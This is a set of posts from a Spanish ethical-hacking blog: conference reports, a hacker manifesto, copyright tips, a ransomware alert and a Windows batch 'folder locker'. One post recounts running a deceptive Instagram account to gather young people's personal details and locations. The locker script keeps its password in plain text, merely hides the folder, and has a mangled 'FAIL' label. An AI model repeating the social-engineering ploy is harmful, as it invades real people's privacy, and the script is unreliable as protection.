Manual -- John The Ripper

AVISO: El presente manual está realizado con fines exclusivamente didácticos, por tanto, no me hago responsable del mal uso que se le pueda dar a este.

Ante todo, hola a todo el mundo! Como dije en su día, todo lo que fuera tocando de seguridad informática y hacking ético lo acabaría compartiendo, pues bueno, aquí os traigo super resumido como realizar un ataque (o análisis) hacia una contraseña con John The Ripper, una aplicación bastante buena para ir practicando.

Como siempre digo, tanto al inicio de la entrada, como en el aviso legal (que lo tienes en la pestaña) como ahora mismo, pongo esto con FINES DIDÁCTICOS, que no se os olvide, o dicho de otra forma, que si la acabáis liando cometiendo un delito yo no me hago responsable de vosotros, ¿vale? Pues tras todo este tochaco, os dejo con el manual.

SecAdmin Resilence 2017

Ya iba siendo hora que metiera una CON en el blog jajaja y no iba a ser menos la que se hace en Sevilla, la famosa SecAdmin, que se lleva realizando cuatro años, de los cuales, tres, son en la ETSII (Escuela Técnica Superior de Ingeniería Informática) así que si quieres saber más de este mundo quédate!

Soy hacker, no delincuente

Esta entrada la escribí hace ya un año por ahí, pero como estaba (y está la cosa) era mejor callarse pero, ya no callo más, así que prepárate porque viene tema.

Querido diario, otra vez me han criticado por ser lo que soy, porque  me apasiona la informática, la ciberseguridad, el hacking, todo este universo en el que me miran como a un bicho raro porque no lo comprenden, muchas veces me siento así, raro.

No son pocas las veces que me han acusado de numerosos delitos (violación de la privacidad, atacar a un servidor para obtener claves, hacer un DDos, hacer ingeniería social...) y tampoco son pocas las veces que han registrado mi puesto o mis pendrives con tal de estar "asegurados" aunque eso si fuera un delito, pero no, no puedo decir nada porque me expulsarían y es una entidad pública a uno más, así que aunque no sea culpable de nada iría al centro de menores, solo por eso, por ser hacker.

Yo si, se hacer ingeniería social, ataques DDos, investigaciones con Google, Shodan, se todo eso, y cada día se más, me he enganchado literalmente a este mundo porque me apasiona, porque me dan algo con intenciones malas y las hago buenas, ayudo a la sociedad, me encanta ponerme la música a todo volumen y probar todas las cosas en mi laboratorio, en ver como ataco mi portátil desde mi teléfono móvil, y los resultados publicarlos para subsanar los errores, para hacer todo un mundo mejor.

A día de hoy me persigue el apodo de delincuente, ladrón, encarcelado pero sobre todo hacker, si, soy hacker pero me ofende muchísimo que me lo digan en ese contexto, porque lo asocian a alguien delictivo, cuando en realidad es alguien que se autosupera, que busca retos, que busca ayudar a todo el mundo, pero para todos eso es ser ciberdelicuente.

Releyendo esto ahora el 20 de Noviembre de 2017, he de decir que he aprendido mucho, más de lo que nunca me imaginaba llegar, estoy a días de ir a mi primera CON, la SecAdmin de Sevilla, cada día engancha esto más, es un mundo al que te invito a entrar. Al principio te van a humillar, a mi hoy me han humillado (o intentado) porque me siguen acusado de los numerosos delitos que me acusaron el año pasado, aun presentando pruebas y que nadie las recogiera, que reciba preguntas incómodas del estilo "¿sabes cuanto es de multa y de cárcel por hacerlo?" pero siempre tendrás a la comunidad.

Mirad, para cerrar, yo voy a seguir con mi filosofía, la que me han enseñado, "Learn, Hack and Share" y como dice el manifiesto

Si, soy un criminal. Mi crimen es la curiosidad.
Mi crimen es el juzgar a las personas por lo que dicen y piensan,
no por lo que aparentan.
Mi crimen es ser más inteligente, algo por lo cual nunca me olvidarás.
Soy un Hacker, este es mi manifiesto.
Tu podrás detener este esfuerzo individual, pero nunca podrás
detenernos a todos . . .
después de todo, todos somos iguales.

Y  quien se sienta ofendido de mi clase, porque los habrá, este es mi blog, Internet es un arma poderosa y yo, tengo la libertad de expresarme en este.

CuriousCat o meterse en la vida de los demás con el anonimato

Surgen nuevas redes sociales, sea para hablar, subir fotos o para hacer preguntas y respuestas, de las que hoy hablaremos de estas últimas que permiten el anonimato.

CuriousCat es una aplicación web donde te permite realizar preguntas en anónimo o desvelando tu identidad, con el consecuente registro para aquí, sí, acreditar la identidad, siendo este tipo de redes la causa de muchos ciberacosos o acosos escolares.

El mecanismo de registro es sencillo, necesitaremos vincular la cuenta de Twitter o Facebook a la aplicación de CuriousCat, obteniendo la red social nuestros datos para crear un perfil adecuado a nosotros pero, ¿como funciona la red social?

AVISO: No tengo nada en contra de la red social CuriousCat, simplemente es que esta aporta mucha información que se puede usar en otros casos, además que los administradores, como veremos abajo, me han respondido a algunas preguntas.

Como ser un hacker

A lo largo de toda esta etapa en la que he aprendido Seguridad Informática, me han venido mucha gente haciéndome la misma pregunta, Manu, ¿como me convierto en un hacker?

Para hacerse un "hacker" no es necesario cumplir con unos requisitos académicos, ni contar con enchufes ni ser seguidor de Anonymous ni nada por el estilo, solo dos cosas, que te apasione y que entiendas la ética hacker.

Si has venido porque quieres ser un hacker para robar contraseñas, acceder a conversaciones de WhatsApp o incluso tener gratis el bonobús te invito a que olvides este mundo y te vayas buscando otra cosa, pues, el significado real de hacker es autosuperarse, enseñar y sobre todo NO HACER DAÑO.

Ahora que de verdad sabes lo que es un hacker, ¿quieres seguir entrando? Si la respuesta es que sí sigue leyendo.

Mordiendo la manzana del paraíso.

FECHA DE PUBLICACIÓN: 08/Agosto/2017

Buenos días hackers! Hoy navegando por las RRSS me he dado de caras con un "sorteo" de un ticket por valor de 1000€ por ser el aniversario de la cadena de Supermercados DIA. Si, hemos vuelto a las estafas de los tickets de compra y hoy veremos como prevenirlos.

He perdido un USB... ¿QUE HAGO?

Esta pregunta nos la hemos hecho la mayoría, pero la minoría (o no se) tenía en esta memoria archivos y datos de carácter personal, como ha sido mi caso en estos días.

Antes de seguir la entrada, quiero agradecer enormemente a este minion, a Marcos @_N4rr34n6_ a ayudarme aportando una gran herramienta para saber el número de serie de mi pendrive, algo que hablaremos en este "manual".

Antes de comenzar (por segunda vez, si), si quieres aprender más sobre la informática forense, te dejo el enlace al blog "Follow The White Rabbit" donde podrás ver alguna de sus entradas (https://www.fwhibbit.es/author/_n4rr34n6_) y sin más dilación empecemos.

Ingeniería Social en los jóvenes.

Si algo sabemos hoy en día que es fácil de hacer es la ingeniería social, es decir, el obtener datos de una persona o claves de esta haciendo que nuestra víctima nos lo de por si mismo o a través de un tercero.
Un suceso que he visto a lo largo de estos días es que en la red social "Instagram" se han multiplicado como células las cuentas al estilo "Se quien eres" "Se quien te gusta" etc. Provocando un auge en los jóvenes por experimentar esta nueva "moda".

Para ver como funciona esto nos vamos a crear una cuenta para que vengan a nosotros, pero antes vamos a analizar el funcionamiento de esta moda.

En la imagen anterior podemos ver como funciona. Nos piden seguir su cuenta, mencionarlos en la aplicación "Stories" dentro de la aplicación de la red social y nombrar amigos. Tras esto automáticamente sabremos todo sobre el sujeto en cuestión.

Este proceso comienza hablando con los amigos (los terceros) para sacar información, haciéndonos pasar por otra cuenta de confianza o desde esta animando a que participasen.
Entre los datos obtenidos se buscan los datos privados o que no los sepan cualquiera para generar misterio ante el usuario que ha comenzado a hablar con nosotros.
Una vez se termina se preguntan si son ciertos los datos, si responde que sí automáticamente tenemos una base para sacar más información.

Tras saber como funciona esto, nos crearemos una cuenta del mismo estilo. Como siempre crearemos un aviso que de por sí interpretaremos como que el usuario lo ha leído y sólo esperaremos a que venga nuestra víctima.

Una persona que despliegue nuestro mensaje verá que se trata de un experimento de ingeniería social, pero si de algo se es que normalmente nadie se molesta en leer después de los hashtags ni menos aún darle a leer más, así que desde un móvil convencional la víctima ve esto.

Tras subir esta foto y dejar la cuenta preparada no nos queda más que esperar a nuestra víctima "pique" y comience a seguirnos y obtener datos de los amigos. Para ello usaré la cuenta personal y la de un colaborador para propagar el "engaño".

Tras media hora hemos conseguido datos personales acerca de cuando suelen quedar, como eran sus vidas, donde participan, donde estudian, etc. Aunque hay un caso que la persona me dejo acceder a su cuenta privada, sin saber quien era, donde aplicando EXIF a las fotos podremos saber hasta la ubicación

Sin más, me despido de esta entrada por ahora...

Talking about Security 01 | Francisco Rosales

Buenos días comunidad!
Como muchos sabéis (y quienes no verán ahora) suelo hacer entrevistas con formato Podcast sobre cualquier temática, y con ello, y queriendo dar contenido nuevo al blog, he creado una nueva sección llamada "Talking About Security" o "Hablando sobre Seguridad" en la que pondré podcast o grabaciones de estas entrevistas donde nos centraremos en la Seguridad Informática y la tecnología en general.

Pasando al contenido en si, este primer episodio lo estreno con Francisco Rosales, notario en Alcalá de Guadaira, Sevilla y ponente en charlas universitarias como por ejemplo la Universidad de Sevilla.
En este capítulo hemos hablado sobre ciberseguridad, ransomware, criptomonedas o contrato digital entre otros, teniendo así una duración de 40 minutos pero donde te garantizo que en esos 40 minutos vas a aprender mucho desde un punto de vista totalmente diferente a lo que se ve hoy en día.

Sin más dar las gracias a Francisco Rosales por aceptar esta entrevista para un proyecto que acaba de nacer, y también a aquellos y aquellas que me leéis cada vez que subo entrada.

Twitter Francisco Rosales: https://twitter.com/notarioalcala
Web Notaría Francisco Rosales: https://www.franciscorosales.es/
Blog Francisco Rosales: https://www.notariofranciscorosales.com/

Por si queréis os dejo las direcciones de monederos de Francisco y mía para realizar donaciones.

ID Francisco Rosales BTC: 1B3Rua1xzKvdTifLwi99XzZF9hc3pqS2xz

ID Francisco Rosales Monero: 4GdoN7NCTi8a5gZug7PrwZNKjvHFmKeV11L6pNJPgj5QNEHsN6eeX3DaAQFwZ1ufD4LYCZKArktt113W7QjWvQ7CW9guhG6Fo7VSchdFAd

ID Francisco Rosales ETH: 0x505bB86218a4C065b824029D8cD4b6777E728B15

ID Hackingot ETH: 0xd85168612331bba50095bd9ed7de70b0433052b7

ID Hackingot BTC: 1KJYH3BpL5jzDzxuHWEbGCX67NUzeDihmQ

Enlace al podcast: https://www.ivoox.com/talking-about-security-01-francisco-rosales-audios-mp3_rf_19960979_1.html

¿Es segura una VPN?

Buenos Días! Hoy el tema del que vengo a hablaros es sobre las famosas VPN y si de verdad son tan seguras como nos prometen en Internet, pero antes de hablar de esto deberíamos saber que son.
Según la Real Academia de este blog, una VPN (Virtual Private Network) es un túnel que te aísla del resto de tu red haciendo el tráfico más seguro, aunque esa no es su única función, como veremos a continuación.

Lo que he aprendido en estos años...

Recuerdo aquel 30 de Octubre cuando dimos inicio a un proyecto llamado la Esquina del Procesador, pasando a ser a día de hoy lo que conocemos como Hackingot.
El interés de pasar el blog al hacking fue por compartir lo que he recibido en todos estos años acerca de la materia, aunque creo que me han enseñado mucho más de lo que he dado, y hoy, me gustaría hacer un resumen de todo esto aquí.

Antes de seguir dar las gracias a Tower, Fran, Petrux, Yolanda, OWASP Sevilla, Marcos, Hack And Beers y todas aquellas personas que me han enseñado de cierta manera un poco de lo que hace que sepa lo que se a día de hoy.

• He aprendido que un sistema NO puede ser privado, pues esto es una sensación de bienestar. Toda máquina conectada es vulnerable.
• De la mano de ToWeR he visto el verdadero sentido de los Lusers, que allá donde vallas encontrarás de todo, hasta un bocata en un armario de comunicaciones.
• Con Yolanda Corral he visto pocos de sus ciberdebates (es algo pendiente que tengo) pero los que he podido ver demuestran que se puede entender la seguridad informática de una manera sencilla.
• Recuerdo mi primera conferencia de seguridad, en el pabellón de Francia, en Sevilla. Organizada por OWASP Sevilla, donde conocí el movimiento y aprendí en las que he ido cosas valiosas, como montar una VPN casera, un proyecto sencillo e interesante.
• Al igual que tantas conferencias, he podido saludar en personas a grandes del sector, como a Silvia Barrera, donde la conocí en una conferencia sobre el acoso y peligros de las redes sociales, y donde vi que mi sueño si existe, estar en la Policía Nacional y Ciberseguridad a la vez.
• Creo que no es necesario decirlo pero, el peligro de las contraseñas débiles y lo necesario que es una autenticación en dos fases o pasos.
• Si4Ti, aquella web, consultora de seguridad, donde pude hablar de uno de los temas que más me apasiona, el acoso en las redes y la ingeniería social.
• He aprendido que un hacker puede ser un padre, un estudiante, un abogado, un policía, un guardia civil, una persona cualquiera, y no, no es necesario la pantalla de Matrix ni la capucha, y si, se recomienda una bombilla.
• Todo deja rastro, aunque pases una herramienta forense, como nos explica Marcos.
• Hay personas maravillosas que sacan adelante programas o propuestas para ayudar a la comunidad, como por ejemplo, x1red+segura, de Angel.

A todos ellos y más, miles de gracias ;)

Nuevo ramsonware asola grandes compañías en España y Europa

Hace cuestión de unos 10 minutos, el CCN-CERT ha decretado alerta de riesgo Muy Alta ante el nuevo ramsonware llamado "Petya".

Este ramsonware viene del año pasado, cuando, con Ingeniería Social y Dropbox consiguió infectarse en miles de ordenadores, aunque, en este caso, usa una tecnología parecida a WannaCrypter, la cual cifra los documentos y muestra en pantalla un mensaje con una dirección de Bitcoin, la moneda anónima, exigiendo un pago de 300$ para la desencriptación de todos los archivos y carpetas cifrados.

El ataque está afectando en gran medida a Ucrania, en especial a una empresa de transportes de alto calibre, aunque no se libran tampoco las farmacéuticas o el puerto de Rotterdam, el más grande de Europa, viéndose obligados a cerrar por seguridad.



Ante todo, recordamos que si sus dispositivos sufren el ataque, desenchufelo inmediatamente de la red eléctrica y evite todo tipo de comunicaciones con los dispositivos, sea correo electrónico, compartir archivos de un USB anterior, etc. y sobre todo, aislar el ramsonware lo antes posible.

Instalar Windows y Ubuntu en VBox

Como dije hace bastante, pero bastante tiempo, la intención del blog iba a ser divulgar todo lo que aprendiera con el ciclo con lo que comenzaré con algo básico pero que nos ha comido a muchos la cabeza y es hacer un sistema operativo virtual con VirtualBox.

El documento lo podréis descargar en el enlace a continuación para poder leerlo con un lector de PDF gratuito, a parte de leerlo a través del enlace aquí en el blog.

Los documentos serán basados en casos prácticos, es decir, situaciones de una tienda de informática con datos "reales" que nos podrá dar un usuario o cliente.

Si tienes dudas háblame por mensaje privado en Twitter a @majeflomon o a través de un comentario bajo esta entrada, sin más, un saludo ;)

https://drive.google.com/file/d/0B4Hnudt24hkOVkpSUUhrWXg3ekE/view?usp=sharing

Como denunciar una web por @soydelbierzo

Hay momentos en los que navegando por Internet encontramos contenido que se debería de eliminar ya sea porque incite o cometa un delito, siendo los más localizados la homeopatía, venta de drogas y pornografía infantil, aunque a la Policía le puede resultar algo difícil dar con ellos, porque como sabemos, Internet tiene un límite casi infinito.

Para ello, para saber como ayudar a hacer de Internet un lugar mejor, os dejo una mini-guía elaborada por @soydelbierzo, en la que nos detalla paso a paso como dar con el responsable legal de la página, aún teniendo esta CloudFlare, algo que se usa más día a día por su servicio gratuito y su "anonimato".

También dar las gracias a Jesús Ruiz @JesusGenialogic por reunir todos los tweets de la mini-guía en un solo documento para hacerlo más accesible.

https://drive.google.com/file/d/0BzzBPOmhlPK5cGxoYnpDWHNKUm8/view

La NSA publica algunos de sus proyectos.

No se sabe desde cuando ha ocurrido esto pero sabemos que la NSA (National Security Agency) ha abierto un perfil en la plataforma de desarrolladores Github, en la que han puesto al público, distintos softwares libres como por ejemplo, el proyecto Qgis que funciona con MGRS, para la localización de puntos exactos en la tierra.
El repositorio, que parece basarse en cuatro lenguajes (Python, Java, Ruby, C) nos ofrece un total de 10 proyectos de libre descarga como dije al principio.

Se podrá acceder al repositorio desde la URL que te dejamos a continuación:
https://github.com/nationalsecurityagency

Mi opinión personal sobre 1º FPGM Informática

Bueno, ya habiendo acabado el curso os detallo un poco mi experiencia en 1º SMR para aquellxs que quieran comenzar el ciclo este año.

EN GENERAL:
El ciclo bastante práctico, se comienza con historia de la informática y se acaban en prácticas de montaje/desmontaje de ordenadores y portátiles (nos quedamos a falta de tablets) y con proyectos de fin de curso, los materiales algo anticuados pero como nos dijeron, es imposible tener un temario al día.

Taller Hacking Etico

NOMBRE: Taller GRATUITO de Hacking Ètico & Auditoria de Redes Wifi
CENTRO: Comunix Grouop
MODALIDAD: On-Line
PRECIO: 0,00€ (Promoción)
TEMÁTICA: Hacking Ético
DURACIÓN: 12 Horas

URL: https://www.comunixgroup.com/producto/taller-gratuito-hacking-auditoria-redes-wifi/

El acoso en las RRSS

Hace poco fue el día contra el acoso escolar pero,  hay un tipo de acoso que no se contempla tanto (desde mi punto de vista) y es el producido en las redes sociales, y el peligro que estas entrañan.
En la entrada de hoy os comento las situaciones que me han venido y como solucionarlos, algunas fáciles y otras no.

Donde me puedes encontrar +Novedades

Buenas Tardes Hackers ;)

Os escribo esta breve entrada para comentaros que me veréis de vez en cuando por la web de Si4Ti, una consultoría tecnológica, en la que iré redactando entradas sobre seguridad aunque, eso no quita que deje de escribir aquí (se avecina proyecto) así que estaros atentos tanto aquí como a la web de Si4Ti para no perderos nada de lo que escriba.

Acceso a Si4Ti

Mi experiencia en OWASP Sevilla

Bueno, como comienzo la entrada... Fue enterarme del evento a través de recomendados de Twitter mientras debatía en las redes sobre forense.

El evento era en Sevilla, una charla-taller que se hacía en El Cubo de Sevilla (Pabellón de Francia) y la primera impresión nada más llegar fue "wow". El edificio hace homenaje a su nombre, aquel cubo que mirabas arriba o al frente (porque si mirabas abajo veías una caída de unos 100 metros mínimo) pero tocaba entrar en las instalaciones.
Llego y me encuentro algo que, como yo decía, parecían instalaciones de Google España (vamos, embobado, que no lo creía.) y llego a la sala de Staff donde es la charla pero antes me doy una vuelta por las instalaciones.

Inevitable no asomarse al vacío, a aquel "precipicio" que no sabías cuanto podía tener de profundidad por sus numerosos espejos. A medida que iba caminando por la zona veía zonas y grupos de trabajo de todo tipo, orientado a jóvenes emprendedores que iban desde comercios hasta desarrollo de videojuegos.

Tras dar una vuelta por la zona me dirijo a la charla, donde la temática principal era la seguridad y anonimato, explicado por varios ponentes en la que salí bastante contento.

Comenzamos la charla con @ramon_salado hablando sobre TOR, lo que de verdad es y que no es tan malo como dicen. Entre las cosas que se comentaron fueron su funcionamiento, alternativas al típico TOR y el tema de los nodos o hosts de salida y cómo salen perjudicados estos y sobre todo su opinión sobre un debate que hay hoy en día en internet... ¿"VPN + TOR" o "TOR + VPN"?



A continuación, creo recordar que nos tocó VPN con @twajoseluis donde nos explicaba como escoger una VPN, en que basarse, cómo es su funcionamiento y recordando que no existe una seguridad que sea 100% fiable o segura además de como convertir un router en una VPN, usarla estando de vacaciones...

Pasamos tras esto a @Ghostmanoficial y a como montar una VPN "casera" en cinco minutos con una RaspberryPi, unos ejecutables y una microSD. El experimento funcionó bastante bien además de hacernos una demostración en vivo del procedimiento de instalación.

Por último aprendimos con @juanjodomenech un poco de teoría sobre los sistemas operativos anonimizados y que hacer en caso de no tener uno. Aquí conocimos algunos como TAILS, Whonix y Kodachi.

Puede que me deje cosas en el tintero. De aquellos que me conocen saben que es costumbre pero quería terminar la entrada dando las gracias a @OWASP_Sevilla por la charla-taller y espero que nos traigan pronto muchas más cosas.

Música SIN infringir la ley | TIPS

Buenas tardes chicos. En una de esas tardes en las que hablo con mi familia me entero que "Fulanito hizo un vídeo con música de Semana Santa y le han puesto una multa gorda". Así que me tocó explicar el tema de Copyright, Derechos de Autor, Propiedad Intelectual, etc. y se me ocurrió la idea de "¿Y si lo subo al blog para quienes no lo saben?" Así que esa es la situación de ahora, la que detallamos a continuación pero vamos a comenzar con un problema.

"Juan graba un vídeo de gatitos e inserta audio de una canción cualquiera famosa. Juan como es un "luser", descarga la canción a través de un portal en plan "INSERTA TU URL DE YOUTUBE Y DESCARGA EN MP3", lo mete en el vídeo y lo sube pero a los cinco minutos le silencian el vídeo, debe pagar una multa y no sabe el por qué"

Vamos a comenzar hablando un poco de términos:

• Copyright: "Derecho exclusivo de un autor, editor o concesionario para explotar una obra literaria, científica o artística durante cierto tiempo"
• Derechos de Autor: "Cantidad de dinero que el autor de una obra cobra como participación en los beneficios que producen su difusión, publicación o reproducción"
• Luser: Por ejemplo alguien como tú, un usuario con conocimientos de informática y/o internet que son básicos cuyo ejemplo podría salir en PdH, XFiles, charlas, etc..

Ahora que tenemos nuestras definiciones vamos a empezar a analizar la situación de Juan.

Comenzamos con que inserta en un vídeo de gatitos una canción famosa, que NO es suya y la obtiene ilegalmente descargándola de Internet, sin consentimiento de autor (o eres un amigo de quien hizo la canción o eres millonario, si es así no se que haces aquí). Al descargar un audio de esta manera estamos creando un delito de descarga ilegal de contenidos (lo mismo que si creas algo y te lo roban) pero sigamos.

A continuación lo inserta en un vídeo, lo cual es crear una obra derivada, sin consentimiento del autor pero suponemos que lo guarda para el (si no me registran no saben nada) pero nuestro amigo Pepe lo sube a YouTube para compartirlo lo cual también es ilegal hacerlo porque publicas contenido creado con otro contenido el cuál no tienes permisos para crear obras derivadas.

A este punto le llega el aviso a Pepe de que su vídeo es silenciado o eliminado pero como es tan guay, eleva el tono del audio para que no se lo coja y se lo admita (YouTube es más listo que tú, créeme) pero también lo monetiza (aquí llegamos al punto de ser idiota) así que le llaman a su casa y acaba en juicio y pagando la multa correspondiente en el mejor de los casos.

Ahora tras ver la historia de Pepe vamos a ver la de Jose.

"Jose es un chaval que hace reportajes y vlogs y quiere usar música de fondo pero Jose es listo y busca música SIN copyright y monetiza el vídeo y acaba ganando más que Pepe."

Lo que hace Jose es buscar en Google "Música sin Copyright" y se descarga una que le gusta, hace el vídeo y lo sube y se hace rico pero Jose no hace todo bien porque, si coges algo indica de donde viene.

DONDE BUSCAR Y DESCARGAR MÚSICA SIN COPYRIGHT

Te dejo acá abajo una lista de webs que permiten descargarse este tipo de música y puede ser mejor que las más famosas (sigue leyendo que queda una última pregunta)

https://licensing.jamendo.com/es/catalogo
http://www.locutortv.es/musicalibredederechos.htm
https://www.youtube.com/channel/UCUFDNffZtBGisDliMx12fYw
https://www.youtube.com/channel/UCXxq51UqKuInU10uu6ov4aw
https://www.youtube.com/channel/UCzanuyCMo2I0UJKksLELAZg

¿QUE PASA SI SUBEN UN VÍDEO CON UNA CANCIÓN SIN COPYRIGHT  PERO EL DUEÑO PONE DERECHOS DE AUTOR AL VÍDEO COMPLETO?

Esta es una duda interesante, la cual me ha comido la cabeza bastante así que me he puesto a investigar (y preguntar a compañeros) y os comento mi conclusión (la de los compañeros llegarán cuando respondan)

@majeflomon : Si nos encontramos en esta situación, la canción está libre de derechos. Recordemos que algo que sea libre de derechos NO exime que pueda usarse para generar beneficios (a salvo que lo indique alguna Licencia Creative Commons (En las Non-Comercial lo encontramos)
 por lo cual es legal crear obras derivadas, subirlas y monetizar pero NUNCA se podrá poner derechos a esa canción ya que estás en pleno derecho de usarla. Aún así, en las webs de arriba tienes la posibilidad en algunas de comprar la licencia desde 4,99€, algo que a la larga merece la pena.

@palabradehacker : "Hola Manuel pues no sabría decirte exactamente puesto que no soy abogada. Que una música sea libre y no sea necesario el reconocimiento de autor no significa que no tenga autor sino que igual ha pasado el suficiente tiempo como para que sea de dominio público. Por ejemplo en la biblioteca de YouTube hay música con derechos de autor que necesitan el reconocimiento y música libre que YouTube pone a disposición y es la que yo uso, que no quiere decir que no tenga reconocimiento sino que YouTube ya lo realiza y porque son piezas que igual ha llegado a acuerdos, son de dominio público como he dicho."

@petruxIT : "En principio, y sin carácter legal -sigo sin ser abogado- habría que ver en qué condiciones se comparte la música (podría ser CC y toda obra derivada debería compartir misma licencia), o podría ser copy-left (que creo que se comparte libre pero sin ánimo de lucro). Ninguno de estos dos modelos se te aplica al caso. Te queda, entiendo, la posibilidad de usar música libre pero autorizada para su uso comercial o adquirir una licencia -que suelen ser económicas- para música que no sea libre. Complicado. Pero entiendo que al no ser tú el autor de la música libre que usas en el vídeo no puedes tener derechos sobre ella; sí los tendrías sobre la totalidad de la obra, como un todo, pero cualquier otra persona podría emplear esa misma música para cualquier otro proyecto que podría liberar con copyright o CC o como fuere."

Hablando de Seguridad | Petrux y @conpilar_zgz

Buenas Tardes ;)
Como es sabido por muchos el pasado 10 de Marzo tuvo lugar en Zaragoza #CONPilar2017, una CON de hackers, estudiantes de seguridad y cualquiera que quisiera venir en donde se compartieron buenos momentos entre talleres y descansos. Por suerte, y doy gracias, contamos con la experiencia de Pedro, mayor conocido en las redes sociales como @petruxIT.
Pedro, Guardia Civil y cibercolaborador fue un ponente en @hackandkids, la parte de la CON orientada a los más pequeños que desean iniciarse en la ciberseguridad.
Sin más os dejo la experiencia escrita por Pedro y esperemos que se animen más personas a acudir a las CON, de nuevo muchas gracias ;)

Una semana después...

Ese es el tiempo que ha pasado desde la CONPilar de este año, y aún dura la resaca. Sí, resaca, causada por lo consumido desde el viernes cuando comenzaba la tarde  y hasta el sábado ya acabando el día.

¿Que qué hemos consumido? Pues, salvando las diferencias, algo parecido al maná celestial; algo capaz de mantenernos unidos, atentos, disfrutando, aprendiendo, enseñando, compartiendo... Hemos compartido espíritu "hacker".

Mucha gente, como diría ese gran Fran a quien echamos en falta, y "mucho diferentes" pero todos juntos. Enseñando esos grandes maestros venidos de Córdoba, Guipúzcoa, Logroño, León, Guadalajara... Y de más cerca también, de Ejea y ¡de la misma Zaragoza! Aprendiendo un montón de gente de distintos ámbitos profesionales, con diferentes intereses en lo tocante a tecnología: desde los más técnicos hasta los que ¿simplemente? son padres con preocupaciones por lo que que el surfear por la web puede acarrear a los niños.

Niños que, dicho sea de paso, han tenido por vez primera en estos eventos el suyo propio: track completo, de todo el día, su "Hack&Kids". Porque este mundo digital que se nos viene encima es suyo, y es desde ya nuestra obligación el ponerles al día, el formarles, el enseñarles el camino correcto y el espíritu del "learn, hack and share".

Aprendimos, y con los mejores: Francisco Pérez Bes, Secretario General del Incibe; el magnífico Jorge Bermúdez, Fiscal de Criminalidad Informática de Guipúzcoa; el mítico Román Ramírez, fundador de la RootedCON; el siempre agudo y divertido Eloy Villa, sufridor de usuarios adictos a los tutoriales de YouTube; Pilar Andrade, empresaria apasionada por la tecnología y convencida de la cooperación; José María Otín, Inspector Jefe del GDT de la UDYCO del CNP; Pedro Canut, abogado y... ¡mil cosas más! que nos ilustró sobre el cyberbullying; ¡y la mente privilegiada de Marcos, el minion curioso! que nos demostró lo fácil que es estar sentado disfrutando de una charla para, de repente, encontrarse al otro lado, de pie, impartiéndola.

¿Y los niños? Aprendiendo a programar con Marta, Jacob y Miguel -tres "abejitas de la HoneyCON" que vinieron zumbando en cuanto los necesitamos; descubriendo con Pedro en plan DIY como se pueden enviar y recbir mensajes secretos por distintos canales de comunicación; interiorizando las pautas mínimas que deben observar en la navegación por la red... ¡y sufriendo los ataques de un malo-malísimo Eloy Villa (sí, también estuvo con los mayores)! que les demostró en vivo y en directo lo peligrosas que son las redes WiFi abiertas.

Y en los descansos, networking. Conoces personas nuevas con mucho que enseñar, con mucho que compartir, con ganas de aprender; de repente te encuentras charlando como si fuérais amigos de toda la vida con cualquiera de los ponentes, con esa magnífica gente que ha sido capaz de sacar adelante la CON, con otros asistentes, perfectos desconocidos que dejan de serlo...

¿Entiendes ahora el por qué de la resaca?¿Entiendes ahora el por qué de ir a una CON? Estás avisado: ir a una CON es superar un punto de no-retorno.

Mi consejo: Ve.

@petruxIT.

Puedes ver su blog en http://goigon.blogspot.com.es/

Por mi parte cierro la entrada con la filosofía que él me ha enseñado "Learn, Hack and Share"

Privatiza tus archivos sin programas

Buenas tardes tirando a noches. Hoy os traigo una guía de como elaborar un "Locker" en Windows de una manera fácil y sin que nos dé problemas a la hora de usarlo pero para entender como hacerlo os responderé a la pregunta:

¿Qué carajo es un locker y para que lo quiero?
Un locker, en palabras que entendería mi yo de hace 8 años sería básicamente "un programa que hace una carpeta y la esconde" así sin más.
Pues entendiendo qué es un locker veremos como hacerlo en cualquier versión de Windows y hasta poder llevarlo en un USB.

1. Creamos un bloc de notas con el nombre que queramos, es decir, como si quieres llamarlo "Locker" o "Apuntes de Mates" porque escondas ahí lo que sea.
2. Entramos en ese fichero y copiamos el siguiente tocho que al principio ni un usuario experto entendería (bueno, sí.)

Y SEÑORAS Y SEÑORES ESTE ES NUESTRO TOCHO

cls 

@ECHO OFF 

title Folder Locker 

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK 

if NOT EXIST Locker goto MDLOCKER 

:CONFIRM 

echo Esta Seguro de que quiere proteger la Carpeta(S/N) 

set/p "cho=>" 

if %cho%==S goto LOCK 

if %cho%==s goto LOCK 

if %cho%==n goto END 

if %cho%==N goto END 

echo Venga, una S o una N. 

goto CONFIRM 

:LOCK 

ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 

echo Tu carpeta ha sido bloqueada

goto End 

:UNLOCK 

echo Venga, ahora la clave

set/p "pass=>" 

if NOT %pass%== (LA CLAVE AQUI) goto FAIL 

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" 

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker 

echo Folder Unlocked successfully 

goto End 

AIL 

echo Vuelve a poner la clave que te has equivocado

goto end 

:MDLOCKER 

md Locker 

echo Creaste bien la carpeta privada

goto End 

:End 

Si te estás echando las manos a la cabeza tranquilo, te lo voy a poner fácil.
Una vez que has copiado esto, si te fijas hay una línea en negrita que pone (LA CLAVE AQUI), pues bien, borras incluso los paréntesis, es decir, debe de quedar un espacio después del "=" y antes del "goto".

Ya has hecho lo más difícil, ahora toca guardarlo bien y para ello nos vamos en el bloc de notas arriba a la izquierda, Archivo y luego a "Guardar Como". Seleccionamos "Todos los archivos" y el nombre del archivo será "LoQueQuierasPoner.bat" y lo guardamos. Recalco el .bat porque sino esto no sirve para nada, así de simple.

Seguridad en las Bibliotecas

Hola Hackers! Hoy os vengo a hablar de un tema que pasa mucho desapercibido pero lo valoro importante y este es la privacidad en los sistemas de las bibliotecas.

Os comento como va el tema. Todo empieza cuando un usuario cualquiera se conecta a la red pública de la bibloteca, sea por Wi-Fi o por los ordenadores que ellos te ponen para disfrutarlos en una hora por sesión.

Como es bien sabido por todos, una red Wi-Fi abierta es gloria para muchos a pesar de tener el cartel de peligro dibujado al inicio de la red, veamos el porque.

Una red pública, siempre decimos, que hay que mantener un especial cuidado, siendo yo el primero que recomienda los proxys ya que, no es una solución del todo anónima, pero si dentro de la red.
En una red como esta NO ESTÁ PERMITIDO el uso de proxys, o al menos yo he intentado conectarme a uno y me daba:

1. Bloqueo por los DNS
